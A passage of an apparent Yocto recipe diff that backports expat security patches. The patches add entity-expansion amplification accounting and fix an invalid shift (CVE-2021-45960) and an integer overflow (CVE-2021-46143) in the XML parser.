+ const char *next = NULL;
+ int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ parser->m_eventEndPtr = next;
+ switch (tok) {
+ /* report partial linebreak - it might be the last token */
+@@ -5164,6 +5395,9 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ entity->open = XML_TRUE;
++#ifdef XML_DTD
++ entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+ entity->processed = 0;
+ openEntity->next = parser->m_openInternalEntities;
+ parser->m_openInternalEntities = openEntity;
+@@ -5182,17 +5416,22 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+ int tok
+ = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+ result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+- tok, next, &next, XML_FALSE, XML_FALSE);
++ tok, next, &next, XML_FALSE, XML_FALSE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ } else
+ #endif /* XML_DTD */
+ result = doContent(parser, parser->m_tagLevel, parser->m_internalEncoding,
+- textStart, textEnd, &next, XML_FALSE);
++ textStart, textEnd, &next, XML_FALSE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+
+ if (result == XML_ERROR_NONE) {
+ if (textEnd != next && parser->m_parsingStatus.parsing == XML_SUSPENDED) {
+ entity->processed = (int)(next - textStart);
+ parser->m_processor = internalEntityProcessor;
+ } else {
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif /* XML_DTD */
+ entity->open = XML_FALSE;
+ parser->m_openInternalEntities = openEntity->next;
+ /* put openEntity back in list of free instances */
+@@ -5225,12 +5464,13 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ int tok
+ = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+ result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+- tok, next, &next, XML_FALSE, XML_TRUE);
++ tok, next, &next, XML_FALSE, XML_TRUE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ } else
+ #endif /* XML_DTD */
+ result = doContent(parser, openEntity->startTagLevel,
+ parser->m_internalEncoding, textStart, textEnd, &next,
+- XML_FALSE);
++ XML_FALSE, XML_ACCOUNT_ENTITY_EXPANSION);
+
+ if (result != XML_ERROR_NONE)
+ return result;
+@@ -5239,6 +5479,9 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ entity->processed = (int)(next - (char *)entity->textPtr);
+ return result;
+ } else {
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+ entity->open = XML_FALSE;
+ parser->m_openInternalEntities = openEntity->next;
+ /* put openEntity back in list of free instances */
+@@ -5252,7 +5495,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ parser->m_processor = prologProcessor;
+ tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ } else
+ #endif /* XML_DTD */
+ {
+@@ -5260,7 +5504,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ /* see externalEntityContentProcessor vs contentProcessor */
+ return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+ s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
+ }
+ }
+
+@@ -5275,9 +5520,10 @@ errorProcessor(XML_Parser parser, const char *s, const char *end,
+
+ static enum XML_Error
+ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+- const char *ptr, const char *end, STRING_POOL *pool) {
++ const char *ptr, const char *end, STRING_POOL *pool,
++ enum XML_Account account) {
+ enum XML_Error result
+- = appendAttributeValue(parser, enc, isCdata, ptr, end, pool);
++ = appendAttributeValue(parser, enc, isCdata, ptr, end, pool, account);
+ if (result)
+ return result;
+ if (! isCdata && poolLength(pool) && poolLastChar(pool) == 0x20)
+@@ -5289,11 +5535,22 @@ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+
+ static enum XML_Error
+ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+- const char *ptr, const char *end, STRING_POOL *pool) {
++ const char *ptr, const char *end, STRING_POOL *pool,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
++#ifndef XML_DTD
++ UNUSED_P(account);
++#endif
++
+ for (;;) {
+ const char *next;
+ int tok = XmlAttributeValueTok(enc, ptr, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, ptr, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ switch (tok) {
+ case XML_TOK_NONE:
+ return XML_ERROR_NONE;
+@@ -5353,6 +5610,14 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+ enc, ptr + enc->minBytesPerChar, next - enc->minBytesPerChar);
+ if (ch) {
++#ifdef XML_DTD
++ /* NOTE: We are replacing 4-6 characters original input for 1 character
++ * so there is no amplification and hence recording without
++ * protection. */
++ accountingDiffTolerated(parser, tok, (char *)&ch,
++ ((char *)&ch) + sizeof(XML_Char), __LINE__,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+ if (! poolAppendChar(pool, ch))
+ return XML_ERROR_NO_MEMORY;
+ break;
+@@ -5430,9 +5695,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ enum XML_Error result;
+ const XML_Char *textEnd = entity->textPtr + entity->textLen;
+ entity->open = XML_TRUE;
++#ifdef XML_DTD
++ entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+ result = appendAttributeValue(parser, parser->m_internalEncoding,
+- isCdata, (char *)entity->textPtr,
+- (char *)textEnd, pool);
++ isCdata, (const char *)entity->textPtr,
++ (const char *)textEnd, pool,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+ entity->open = XML_FALSE;
+ if (result)
+ return result;
+@@ -5462,13 +5734,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+
+ static enum XML_Error
+ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+- const char *entityTextPtr, const char *entityTextEnd) {
++ const char *entityTextPtr, const char *entityTextEnd,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ STRING_POOL *pool = &(dtd->entityValuePool);
+ enum XML_Error result = XML_ERROR_NONE;
+ #ifdef XML_DTD
+ int oldInEntityValue = parser->m_prologState.inEntityValue;
+ parser->m_prologState.inEntityValue = 1;
++#else
++ UNUSED_P(account);
+ #endif /* XML_DTD */
+ /* never return Null for the value argument in EntityDeclHandler,
+ since this would indicate an external entity; therefore we
+@@ -5481,6 +5756,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ for (;;) {
+ const char *next;
+ int tok = XmlEntityValueTok(enc, entityTextPtr, entityTextEnd, &next);
++
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, entityTextPtr, next, __LINE__,
++ account)) {
++ accountingOnAbort(parser);
++ result = XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ goto endEntityValue;
++ }
++#endif
++
+ switch (tok) {
+ case XML_TOK_PARAM_ENTITY_REF:
+ #ifdef XML_DTD
+@@ -5516,13 +5801,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ if (parser->m_externalEntityRefHandler) {
+ dtd->paramEntityRead = XML_FALSE;
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ if (! parser->m_externalEntityRefHandler(
+ parser->m_externalEntityRefHandlerArg, 0, entity->base,
+ entity->systemId, entity->publicId)) {
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ result = XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+ goto endEntityValue;
+ }
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ if (! dtd->paramEntityRead)
+ dtd->keepProcessing = dtd->standalone;
+@@ -5530,9 +5818,12 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ dtd->keepProcessing = dtd->standalone;
+ } else {
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ result = storeEntityValue(
+- parser, parser->m_internalEncoding, (char *)entity->textPtr,
+- (char *)(entity->textPtr + entity->textLen));
++ parser, parser->m_internalEncoding, (const char *)entity->textPtr,
++ (const char *)(entity->textPtr + entity->textLen),
++ XML_ACCOUNT_ENTITY_EXPANSION);
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ if (result)
+ goto endEntityValue;
+@@ -6893,3 +7184,741 @@ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+ memcpy(result, s, charsRequired * sizeof(XML_Char));
+ return result;
+ }
++
++#ifdef XML_DTD
++
++static float
++accountingGetCurrentAmplification(XML_Parser rootParser) {
++ const XmlBigCount countBytesOutput
++ = rootParser->m_accounting.countBytesDirect
++ + rootParser->m_accounting.countBytesIndirect;
++ const float amplificationFactor
++ = rootParser->m_accounting.countBytesDirect
++ ? (countBytesOutput
++ / (float)(rootParser->m_accounting.countBytesDirect))
++ : 1.0f;
++ assert(! rootParser->m_parentParser);
++ return amplificationFactor;
++}
++
++static void
++accountingReportStats(XML_Parser originParser, const char *epilog) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ if (rootParser->m_accounting.debugLevel < 1) {
++ return;
++ }
++
++ const float amplificationFactor
++ = accountingGetCurrentAmplification(rootParser);
++ fprintf(stderr,
++ "expat: Accounting(%p): Direct " EXPAT_FMT_ULL(
++ "10") ", indirect " EXPAT_FMT_ULL("10") ", amplification %8.2f%s",
++ (void *)rootParser, rootParser->m_accounting.countBytesDirect,
++ rootParser->m_accounting.countBytesIndirect,
++ (double)amplificationFactor, epilog);
++}
++
++static void
++accountingOnAbort(XML_Parser originParser) {
++ accountingReportStats(originParser, " ABORTING\n");
++}
++
++static void
++accountingReportDiff(XML_Parser rootParser,
++ unsigned int levelsAwayFromRootParser, const char *before,
++ const char *after, ptrdiff_t bytesMore, int source_line,
++ enum XML_Account account) {
++ assert(! rootParser->m_parentParser);
++
++ fprintf(stderr,
++ " (+" EXPAT_FMT_PTRDIFF_T("6") " bytes %s|%d, xmlparse.c:%d) %*s\"",
++ bytesMore, (account == XML_ACCOUNT_DIRECT) ? "DIR" : "EXP",
++ levelsAwayFromRootParser, source_line, 10, "");
++
++ const char ellipis[] = "[..]";
++ const size_t ellipsisLength = sizeof(ellipis) /* because compile-time */ - 1;
++ const unsigned int contextLength = 10;
++
++ /* Note: Performance is of no concern here */
++ const char *walker = before;
++ if ((rootParser->m_accounting.debugLevel >= 3)
++ || (after - before)
++ <= (ptrdiff_t)(contextLength + ellipsisLength + contextLength)) {
++ for (; walker < after; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ } else {
++ for (; walker < before + contextLength; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ fprintf(stderr, ellipis);
++ walker = after - contextLength;
++ for (; walker < after; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ }
++ fprintf(stderr, "\"\n");
++}
++
++static XML_Bool
++accountingDiffTolerated(XML_Parser originParser, int tok, const char *before,
++ const char *after, int source_line,
++ enum XML_Account account) {
++ /* Note: We need to check the token type *first* to be sure that
++ * we can even access variable <after>, safely.
++ * E.g. for XML_TOK_NONE <after> may hold an invalid pointer. */
++ switch (tok) {
++ case XML_TOK_INVALID:
++ case XML_TOK_PARTIAL:
++ case XML_TOK_PARTIAL_CHAR:
++ case XML_TOK_NONE:
++ return XML_TRUE;
++ }
++
++ if (account == XML_ACCOUNT_NONE)
++ return XML_TRUE; /* because these bytes have been accounted for, already */
++
++ unsigned int levelsAwayFromRootParser;
++ const XML_Parser rootParser
++ = getRootParserOf(originParser, &levelsAwayFromRootParser);
++ assert(! rootParser->m_parentParser);
++
++ const int isDirect
++ = (account == XML_ACCOUNT_DIRECT) && (originParser == rootParser);
++ const ptrdiff_t bytesMore = after - before;
++
++ XmlBigCount *const additionTarget
++ = isDirect ? &rootParser->m_accounting.countBytesDirect
++ : &rootParser->m_accounting.countBytesIndirect;
++
++ /* Detect and avoid integer overflow */
++ if (*additionTarget > (XmlBigCount)(-1) - (XmlBigCount)bytesMore)
++ return XML_FALSE;
++ *additionTarget += bytesMore;
++
++ const XmlBigCount countBytesOutput
++ = rootParser->m_accounting.countBytesDirect
++ + rootParser->m_accounting.countBytesIndirect;
++ const float amplificationFactor
++ = accountingGetCurrentAmplification(rootParser);
++ const XML_Bool tolerated
++ = (countBytesOutput < rootParser->m_accounting.activationThresholdBytes)
++ || (amplificationFactor
++ <= rootParser->m_accounting.maximumAmplificationFactor);
++
++ if (rootParser->m_accounting.debugLevel >= 2) {
++ accountingReportStats(rootParser, "");
++ accountingReportDiff(rootParser, levelsAwayFromRootParser, before, after,
++ bytesMore, source_line, account);
++ }
++
++ return tolerated;
++}
++
++static void
++entityTrackingReportStats(XML_Parser rootParser, ENTITY *entity,
++ const char *action, int sourceLine) {
++ assert(! rootParser->m_parentParser);
++ if (rootParser->m_entity_stats.debugLevel < 1)
++ return;
++
++# if defined(XML_UNICODE)
++ const char *const entityName = "[..]";
++# else
++ const char *const entityName = entity->name;
++# endif
++
++ fprintf(
++ stderr,
++ "expat: Entities(%p): Count %9d, depth %2d/%2d %*s%s%s; %s length %d (xmlparse.c:%d)\n",
++ (void *)rootParser, rootParser->m_entity_stats.countEverOpened,
++ rootParser->m_entity_stats.currentDepth,
++ rootParser->m_entity_stats.maximumDepthSeen,
++ (rootParser->m_entity_stats.currentDepth - 1) * 2, "",
++ entity->is_param ? "%" : "&", entityName, action, entity->textLen,
++ sourceLine);
++}
++
++static void
++entityTrackingOnOpen(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ rootParser->m_entity_stats.countEverOpened++;
++ rootParser->m_entity_stats.currentDepth++;
++ if (rootParser->m_entity_stats.currentDepth
++ > rootParser->m_entity_stats.maximumDepthSeen) {
++ rootParser->m_entity_stats.maximumDepthSeen++;
++ }
++
++ entityTrackingReportStats(rootParser, entity, "OPEN ", sourceLine);
++}
++
++static void
++entityTrackingOnClose(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ entityTrackingReportStats(rootParser, entity, "CLOSE", sourceLine);
++ rootParser->m_entity_stats.currentDepth--;
++}
++
++static XML_Parser
++getRootParserOf(XML_Parser parser, unsigned int *outLevelDiff) {
++ XML_Parser rootParser = parser;
++ unsigned int stepsTakenUpwards = 0;
++ while (rootParser->m_parentParser) {
++ rootParser = rootParser->m_parentParser;
++ stepsTakenUpwards++;
++ }
++ assert(! rootParser->m_parentParser);
++ if (outLevelDiff != NULL) {
++ *outLevelDiff = stepsTakenUpwards;
++ }
++ return rootParser;
++}
++
++static const char *
++unsignedCharToPrintable(unsigned char c) {
++ switch (c) {
++ case 0:
++ return "\\0";
++ case 1:
++ return "\\x1";
++ case 2:
++ return "\\x2";
++ case 3:
++ return "\\x3";
++ case 4:
++ return "\\x4";
++ case 5:
++ return "\\x5";
++ case 6:
++ return "\\x6";
++ case 7:
++ return "\\x7";
++ case 8:
++ return "\\x8";
++ case 9:
++ return "\\t";
++ case 10:
++ return "\\n";
++ case 11:
++ return "\\xB";
++ case 12:
++ return "\\xC";
++ case 13:
++ return "\\r";
++ case 14:
++ return "\\xE";
++ case 15:
++ return "\\xF";
++ case 16:
++ return "\\x10";
++ case 17:
++ return "\\x11";
++ case 18:
++ return "\\x12";
++ case 19:
++ return "\\x13";
++ case 20:
++ return "\\x14";
++ case 21:
++ return "\\x15";
++ case 22:
++ return "\\x16";
++ case 23:
++ return "\\x17";
++ case 24:
++ return "\\x18";
++ case 25:
++ return "\\x19";
++ case 26:
++ return "\\x1A";
++ case 27:
++ return "\\x1B";
++ case 28:
++ return "\\x1C";
++ case 29:
++ return "\\x1D";
++ case 30:
++ return "\\x1E";
++ case 31:
++ return "\\x1F";
++ case 32:
++ return " ";
++ case 33:
++ return "!";
++ case 34:
++ return "\\\"";
++ case 35:
++ return "#";
++ case 36:
++ return "$";
++ case 37:
++ return "%";
++ case 38:
++ return "&";
++ case 39:
++ return "'";
++ case 40:
++ return "(";
++ case 41:
++ return ")";
++ case 42:
++ return "*";
++ case 43:
++ return "+";
++ case 44:
++ return ",";
++ case 45:
++ return "-";
++ case 46:
++ return ".";
++ case 47:
++ return "/";
++ case 48:
++ return "0";
++ case 49:
++ return "1";
++ case 50:
++ return "2";
++ case 51:
++ return "3";
++ case 52:
++ return "4";
++ case 53:
++ return "5";
++ case 54:
++ return "6";
++ case 55:
++ return "7";
++ case 56:
++ return "8";
++ case 57:
++ return "9";
++ case 58:
++ return ":";
++ case 59:
++ return ";";
++ case 60:
++ return "<";
++ case 61:
++ return "=";
++ case 62:
++ return ">";
++ case 63:
++ return "?";
++ case 64:
++ return "@";
++ case 65:
++ return "A";
++ case 66:
++ return "B";
++ case 67:
++ return "C";
++ case 68:
++ return "D";
++ case 69:
++ return "E";
++ case 70:
++ return "F";
++ case 71:
++ return "G";
++ case 72:
++ return "H";
++ case 73:
++ return "I";
++ case 74:
++ return "J";
++ case 75:
++ return "K";
++ case 76:
++ return "L";
++ case 77:
++ return "M";
++ case 78:
++ return "N";
++ case 79:
++ return "O";
++ case 80:
++ return "P";
++ case 81:
++ return "Q";
++ case 82:
++ return "R";
++ case 83:
++ return "S";
++ case 84:
++ return "T";
++ case 85:
++ return "U";
++ case 86:
++ return "V";
++ case 87:
++ return "W";
++ case 88:
++ return "X";
++ case 89:
++ return "Y";
++ case 90:
++ return "Z";
++ case 91:
++ return "[";
++ case 92:
++ return "\\\\";
++ case 93:
++ return "]";
++ case 94:
++ return "^";
++ case 95:
++ return "_";
++ case 96:
++ return "`";
++ case 97:
++ return "a";
++ case 98:
++ return "b";
++ case 99:
++ return "c";
++ case 100:
++ return "d";
++ case 101:
++ return "e";
++ case 102:
++ return "f";
++ case 103:
++ return "g";
++ case 104:
++ return "h";
++ case 105:
++ return "i";
++ case 106:
++ return "j";
++ case 107:
++ return "k";
++ case 108:
++ return "l";
++ case 109:
++ return "m";
++ case 110:
++ return "n";
++ case 111:
++ return "o";
++ case 112:
++ return "p";
++ case 113:
++ return "q";
++ case 114:
++ return "r";
++ case 115:
++ return "s";
++ case 116:
++ return "t";
++ case 117:
++ return "u";
++ case 118:
++ return "v";
++ case 119:
++ return "w";
++ case 120:
++ return "x";
++ case 121:
++ return "y";
++ case 122:
++ return "z";
++ case 123:
++ return "{";
++ case 124:
++ return "|";
++ case 125:
++ return "}";
++ case 126:
++ return "~";
++ case 127:
++ return "\\x7F";
++ case 128:
++ return "\\x80";
++ case 129:
++ return "\\x81";
++ case 130:
++ return "\\x82";
++ case 131:
++ return "\\x83";
++ case 132:
++ return "\\x84";
++ case 133:
++ return "\\x85";
++ case 134:
++ return "\\x86";
++ case 135:
++ return "\\x87";
++ case 136:
++ return "\\x88";
++ case 137:
++ return "\\x89";
++ case 138:
++ return "\\x8A";
++ case 139:
++ return "\\x8B";
++ case 140:
++ return "\\x8C";
++ case 141:
++ return "\\x8D";
++ case 142:
++ return "\\x8E";
++ case 143:
++ return "\\x8F";
++ case 144:
++ return "\\x90";
++ case 145:
++ return "\\x91";
++ case 146:
++ return "\\x92";
++ case 147:
++ return "\\x93";
++ case 148:
++ return "\\x94";
++ case 149:
++ return "\\x95";
++ case 150:
++ return "\\x96";
++ case 151:
++ return "\\x97";
++ case 152:
++ return "\\x98";
++ case 153:
++ return "\\x99";
++ case 154:
++ return "\\x9A";
++ case 155:
++ return "\\x9B";
++ case 156:
++ return "\\x9C";
++ case 157:
++ return "\\x9D";
++ case 158:
++ return "\\x9E";
++ case 159:
++ return "\\x9F";
++ case 160:
++ return "\\xA0";
++ case 161:
++ return "\\xA1";
++ case 162:
++ return "\\xA2";
++ case 163:
++ return "\\xA3";
++ case 164:
++ return "\\xA4";
++ case 165:
++ return "\\xA5";
++ case 166:
++ return "\\xA6";
++ case 167:
++ return "\\xA7";
++ case 168:
++ return "\\xA8";
++ case 169:
++ return "\\xA9";
++ case 170:
++ return "\\xAA";
++ case 171:
++ return "\\xAB";
++ case 172:
++ return "\\xAC";
++ case 173:
++ return "\\xAD";
++ case 174:
++ return "\\xAE";
++ case 175:
++ return "\\xAF";
++ case 176:
++ return "\\xB0";
++ case 177:
++ return "\\xB1";
++ case 178:
++ return "\\xB2";
++ case 179:
++ return "\\xB3";
++ case 180:
++ return "\\xB4";
++ case 181:
++ return "\\xB5";
++ case 182:
++ return "\\xB6";
++ case 183:
++ return "\\xB7";
++ case 184:
++ return "\\xB8";
++ case 185:
++ return "\\xB9";
++ case 186:
++ return "\\xBA";
++ case 187:
++ return "\\xBB";
++ case 188:
++ return "\\xBC";
++ case 189:
++ return "\\xBD";
++ case 190:
++ return "\\xBE";
++ case 191:
++ return "\\xBF";
++ case 192:
++ return "\\xC0";
++ case 193:
++ return "\\xC1";
++ case 194:
++ return "\\xC2";
++ case 195:
++ return "\\xC3";
++ case 196:
++ return "\\xC4";
++ case 197:
++ return "\\xC5";
++ case 198:
++ return "\\xC6";
++ case 199:
++ return "\\xC7";
++ case 200:
++ return "\\xC8";
++ case 201:
++ return "\\xC9";
++ case 202:
++ return "\\xCA";
++ case 203:
++ return "\\xCB";
++ case 204:
++ return "\\xCC";
++ case 205:
++ return "\\xCD";
++ case 206:
++ return "\\xCE";
++ case 207:
++ return "\\xCF";
++ case 208:
++ return "\\xD0";
++ case 209:
++ return "\\xD1";
++ case 210:
++ return "\\xD2";
++ case 211:
++ return "\\xD3";
++ case 212:
++ return "\\xD4";
++ case 213:
++ return "\\xD5";
++ case 214:
++ return "\\xD6";
++ case 215:
++ return "\\xD7";
++ case 216:
++ return "\\xD8";
++ case 217:
++ return "\\xD9";
++ case 218:
++ return "\\xDA";
++ case 219:
++ return "\\xDB";
++ case 220:
++ return "\\xDC";
++ case 221:
++ return "\\xDD";
++ case 222:
++ return "\\xDE";
++ case 223:
++ return "\\xDF";
++ case 224:
++ return "\\xE0";
++ case 225:
++ return "\\xE1";
++ case 226:
++ return "\\xE2";
++ case 227:
++ return "\\xE3";
++ case 228:
++ return "\\xE4";
++ case 229:
++ return "\\xE5";
++ case 230:
++ return "\\xE6";
++ case 231:
++ return "\\xE7";
++ case 232:
++ return "\\xE8";
++ case 233:
++ return "\\xE9";
++ case 234:
++ return "\\xEA";
++ case 235:
++ return "\\xEB";
++ case 236:
++ return "\\xEC";
++ case 237:
++ return "\\xED";
++ case 238:
++ return "\\xEE";
++ case 239:
++ return "\\xEF";
++ case 240:
++ return "\\xF0";
++ case 241:
++ return "\\xF1";
++ case 242:
++ return "\\xF2";
++ case 243:
++ return "\\xF3";
++ case 244:
++ return "\\xF4";
++ case 245:
++ return "\\xF5";
++ case 246:
++ return "\\xF6";
++ case 247:
++ return "\\xF7";
++ case 248:
++ return "\\xF8";
++ case 249:
++ return "\\xF9";
++ case 250:
++ return "\\xFA";
++ case 251:
++ return "\\xFB";
++ case 252:
++ return "\\xFC";
++ case 253:
++ return "\\xFD";
++ case 254:
++ return "\\xFE";
++ case 255:
++ return "\\xFF";
++ default:
++ assert(0); /* never gets here */
++ return "dead code";
++ }
++ assert(0); /* never gets here */
++}
++
++#endif /* XML_DTD */
++
++static unsigned long
++getDebugLevel(const char *variableName, unsigned long defaultDebugLevel) {
++ const char *const valueOrNull = getenv(variableName);
++ if (valueOrNull == NULL) {
++ return defaultDebugLevel;
++ }
++ const char *const value = valueOrNull;
++
++ errno = 0;
++ char *afterValue = (char *)value;
++ unsigned long debugLevel = strtoul(value, &afterValue, 10);
++ if ((errno != 0) || (afterValue[0] != '\0')) {
++ errno = 0;
++ return defaultDebugLevel;
++ }
++
++ return debugLevel;
++}
+--
+2.32.0
+
diff --git a/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
new file mode 100644
index 0000000000..523449e22c
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
@@ -0,0 +1,65 @@
+From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 27 Dec 2021 20:15:02 +0100
+Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
+ storeAtts (CVE-2021-45960)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
+
+CVE: CVE-2021-45960
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
+ 1 file changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d730f41c3..b47c31b05 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ if (nPrefixes) {
+ int j; /* hash table index */
+ unsigned long version = parser->m_nsAttsVersion;
+- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
+ unsigned char oldNsAttsPower = parser->m_nsAttsPower;
+ /* size of hash table must be at least 2 * (# of prefixed attributes) */
+ if ((nPrefixes << 1)
+@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ ;
+ if (parser->m_nsAttsPower < 3)
+ parser->m_nsAttsPower = 3;
+- nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ nsAttsSize = 1u << parser->m_nsAttsPower;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
+ nsAttsSize * sizeof(NS_ATT));
+ if (! temp) {
diff --git a/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
new file mode 100644
index 0000000000..b1a726d9a8
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
@@ -0,0 +1,49 @@
+From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 25 Dec 2021 20:52:08 +0100
+Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
+ doProlog (CVE-2021-46143)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/538/commits/85ae9a2d7d0e9358f356b33977b842df8ebaec2b
+
+CVE: CVE-2021-46143
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ expat/lib/xmlparse.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index b47c31b0..8f243126 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_prologState.level >= parser->m_groupSize) {
+ if (parser->m_groupSize) {
+ {
++ /* Detect and prevent integer overflow */
++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ char *const new_connector = (char *)REALLOC(
+ parser, parser->m_groupConnector, parser->m_groupSize *= 2);
+ if (new_connector == NULL) {
